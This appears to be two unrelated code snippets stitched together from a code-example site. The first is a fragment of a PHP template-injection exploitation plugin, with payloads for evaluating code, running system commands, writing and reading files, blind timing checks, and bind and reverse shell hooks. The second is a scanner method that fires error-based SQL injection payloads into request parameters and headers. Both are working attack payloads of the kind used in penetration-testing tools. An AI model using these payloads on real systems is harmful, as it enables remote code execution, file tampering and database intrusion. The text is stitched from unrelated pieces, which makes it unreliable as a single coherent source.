                'trailer': """print_r('%(trailer)s');""",
                # Expected value is the first 10 hex digits of md5(r1), computed locally.
                'test_render': 'print(md5(%(r1)s));' % {
                    'r1': rand.randints[0]
                },
                'test_render_expected': '%(r1)s' % {
                    'r1': getmd5(rand.randints[0])[0:10]
                }
            },
            'write': {
                'call': 'evaluate',
                # chunk_b64 is URL-safe base64 without padding; strtr/str_pad restore standard form.
                'write':
                """$d="%(chunk_b64)s"; file_put_contents("%(path)s", base64_decode(str_pad(strtr($d, '-_', '+/'), strlen($d)%%4,'=',STR_PAD_RIGHT)),FILE_APPEND);""",
                'truncate': """file_put_contents("%(path)s", "");"""
            },
            'read': {
                'call': 'evaluate',
                'read':
                """print(base64_encode(file_get_contents("%(path)s")));"""
            },
            'md5': {
                'call': 'evaluate',
                'md5':
                """is_file("%(path)s") && print(md5_file("%(path)s"));"""
            },
            'evaluate': {
                'call': 'render',
                'evaluate': """%(code)s""",
                'test_os': 'echo PHP_OS;',
                'test_os_expected': '^[\w-]+$'
            },
            'execute': {
                'call': 'evaluate',
                'execute':
                """$d="%(code_b64)s";system(base64_decode(str_pad(strtr($d,'-_','+/'),strlen($d)%%4,'=',STR_PAD_RIGHT)));""",
                'test_cmd': bash.echo % {
                    's1': rand.randstrings[2]
                },
                'test_cmd_expected': rand.randstrings[2]
            },
            'blind': {
                'call': 'evaluate_blind',
                'test_bool_true': """True""",
                'test_bool_false': """False"""
            },
            # Blind variants signal a true result through a delay of %(delay)i seconds.
            'evaluate_blind': {
                'call':
                'inject',
                'evaluate_blind':
                """$d="%(code_b64)s";eval("return (" . base64_decode(str_pad(strtr($d, '-_', '+/'), strlen($d)%%4,'=',STR_PAD_RIGHT)) . ") && sleep(%(delay)i);");"""
            },
            'execute_blind': {
                'call':
                'inject',
                'execute_blind':
                """$d="%(code_b64)s";system(base64_decode(str_pad(strtr($d, '-_', '+/'), strlen($d)%%4,'=',STR_PAD_RIGHT)). " && sleep %(delay)i");"""
            },
            'bind_shell': {
                'call': 'execute_blind',
                'bind_shell': bash.bind_shell
            },
            'reverse_shell': {
                'call': 'execute_blind',
                'reverse_shell': bash.reverse_shell
            },
        })

        # Contexts describe how injected code must be wrapped depending on where in
        # the template source it lands; %(closure)s is filled from ctx_closures.
        self.set_contexts([

            # Text context, no closures
            {
                'level': 0
            },

            # This terminates the statement with ;
            {
                'level': 1,
                'prefix': '%(closure)s;',
                'suffix': '//',
                'closures': ctx_closures
            },

            # This does not need termination e.g. if(%s) {}
            {
                'level': 2,
                'prefix': '%(closure)s',
                'suffix': '//',
                'closures': ctx_closures
            },

            # Comment blocks
            {
                'level': 5,
                'prefix': '*/',
                'suffix': '/*'
            },
        ])
示例#26
    def verify(self):
        """Probe parameters and selected request headers for error-based SQL injection.

        Phase 1: for every URL/body parameter a request per payload is built
        with ``self.parser.getreqfromparam`` and handed to ``self.args_inject``
        on ``cmd_line_options.threads`` threads.  Phase 2 (only when
        ``plugin_set["sqli"]["header_inject"]`` is set): for each header in
        ``header_msg`` that ``self.output`` has not rate-limited yet, the
        captured headers are copied, the header is filled with its default if
        absent, and one request per payload goes to ``self.header_inject``.
        Findings are recorded by those two methods.  Returns None.
        """
        if self.dictdata.get("url").get("extension").lower() in notAcceptedExt:
            return
        # Search the captured response:
        self.parser = dictdata_parser(self.dictdata)  # stored on the instance for args_inject/header_inject

        # Blacklist
        # tomcat sample and documentation paths
        if self.dictdata.get("url").get("path").startswith(
                "/examples/") or self.dictdata.get("url").get(
                    "path").startswith("/docs/"):
            return
        # Parameter injection (URL and body parameters)
        random_num = get_random_num(8)
        random_num_md5 = getmd5(random_num)
        # (payload, search string or None, method): "a" / "w" presumably mean append to /
        # overwrite the original value — confirm in dictdata_parser.getreqfromparam.
        payloads = [
            ('"and/**/extractvalue(1,concat(char(126),md5({})))and"'.format(
                random_num), random_num_md5, "a"),
            ("'and/**/extractvalue(1,concat(char(126),md5({})))and'".format(
                random_num), random_num_md5, "a"),
            ("'and(select'1'from/**/cast(md5({})as/**/int))>'0".format(
                random_num), random_num_md5, "a"),
            ('"and(select\'1\'from/**/cast(md5({})as/**/int))>"0'.format(
                random_num), random_num_md5, "a"),
            ("'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','{}')))>'0"
             .format(random_num), random_num_md5, "a"),
            ('"and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes(\'MD5\',\'{}\')))>"0'
             .format(random_num), random_num_md5, "a"),
            ("'and/**/extractvalue(1,concat(char(126),md5({})))and'".format(
                random_num), random_num_md5, "a"),
            ('"and/**/extractvalue(1,concat(char(126),md5({})))and"'.format(
                random_num), random_num_md5, "a"),
            ("/**/and/**/cast(md5('{}')as/**/int)>0".format(random_num),
             random_num_md5, "a"),
            ("convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','{}')))".
             format(random_num), random_num_md5, "w"),
            ("extractvalue(1,concat(char(126),md5({})))".format(random_num),
             random_num_md5, "w")
        ]
        params = self.dictdata.get("request").get("params").get("params_url") + \
                 self.dictdata.get("request").get("params").get("params_body")
        reqs = []
        if params:
            for param in params:
                # The leading entry is a syntax-breaking probe checked by reflected error text (search_str None).
                for payload, search_str, method in [('鎈\'"\(', None, "a")
                                                    ] + payloads:
                    req = self.parser.getreqfromparam(param, method, payload)
                    reqs.append(
                        (req, payload, search_str, random_num_md5, param))
        mythread(self.args_inject, reqs, cmd_line_options.threads)

        # Header injection
        if not plugin_set.get("sqli").get("header_inject"):
            return
        # Per header: the rate-limit key passed to self.output, and the value used
        # when the captured request did not carry that header.
        header_msg = {
            "User-Agent": {
                "msg":
                "sqli_error_ua",
                "default":
                "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.163 Safari/537.36"
            },
            "Referer": {
                "msg": "sqli_error_referer",
                "default": "https://www.qq.com/search"
            },
            "X-Forwarded-For": {
                "msg": "sqli_error_xff",
                "default": "12.40.9.144"
            },
            "Real-Ip": {
                "msg": "sqli_error_ri",
                "default": "2.40.9.144"
            },
            "X-Forwarded-Host": {
                "msg": "sqli_error_xfh",
                "default": "2.40.9.144"
            },
        }
        reqs = []

        for k, v in header_msg.items():
            if self.output(v.get("msg")):
                logger.debug("start {} inject ".format(k))

                # Deep copies: the captured headers must stay untouched for the other probes.
                headers = copy.deepcopy(
                    self.dictdata.get("request").get("headers"))
                if k not in headers.keys():
                    headers[k] = v.get("default")
                for payload, search_str, method in [('\'"\(', None, "a")
                                                    ] + payloads:
                    headers_withpayload = copy.deepcopy(headers)
                    headers_withpayload[k] = headers_withpayload[
                        k] + payload if method == "a" else payload
                    req = self.parser.generaterequest(
                        {"headers": headers_withpayload})
                    reqs.append((req, (payload, search_str, k, v.get("msg"))))
        mythread(self.header_inject, reqs, cmd_line_options.threads)